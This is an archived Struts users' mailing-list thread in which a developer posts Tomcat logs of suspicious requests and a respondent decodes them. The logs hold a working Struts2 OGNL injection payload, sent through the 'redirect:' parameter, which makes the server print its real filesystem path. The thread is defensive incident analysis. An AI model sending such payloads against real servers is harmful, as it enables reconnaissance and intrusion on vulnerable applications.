struts-user mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From JOSE L MARTINEZ-AVIAL <jlm...@gmail.com>
Subject Re: Security Issues & Vulnerability
Date Thu, 30 Jan 2014 21:36:53 GMT
What version of Struts are you using? It seems

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
/common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
HTTP/1.0" 200 74

transforms to

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
/common/test2.action?redirect:${#a=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#b=#a.getRealPath("/"),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#b),#matt.getWriter().flush(),#matt.getWriter().close()}
HTTP/1.0" 200 74

That basically returns on the response the real path of your application.





2014-01-30 Amol Ghotankar <ghotankarua50@gmail.com>

> I have seen some sample app for testing which was developed using struts2.
>
> I saw some unknow files getting uploaded on test,
>
> I initially thought that my tomcat was hacked or my server was hacked but
> now after a close analysis it looks a struts2 webwork secuirty issue or
> vulenrability or may me my miss configurations or something not sure
>
> Can any one in struts2 team fix this gloabally and help me to get rid of
> this locally without version upgrades.....
>
> Here are the tomcat logs which clearly says the story
>
> 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
>
> /common/test.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
> HTTP/1.0" 200 74
>
> 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
>
> /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
> HTTP/1.0" 200 74
>
> 60.15.137.72 - - [27/Jan/2014:17:51:49 +0530] "GET
>
> /common/test3.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
> HTTP/1.0" 200 74
>
>
> I hope my issue is clear and valid.
>
> Original issue on stackoverflow at
>
> http://stackoverflow.com/questions/21104956/tomcat-files-getting-uploaded-security-loophole
>
>
>
>
> --
>
>
>
> *With Best Regards,*
>
> Amol Ghotankar
> Technical Lead
> M: +91 9960 980 419 <http://www.cursivetech.com>
>

Mime
  • Unnamed multipart/alternative (inline, None, 0 bytes)
View raw message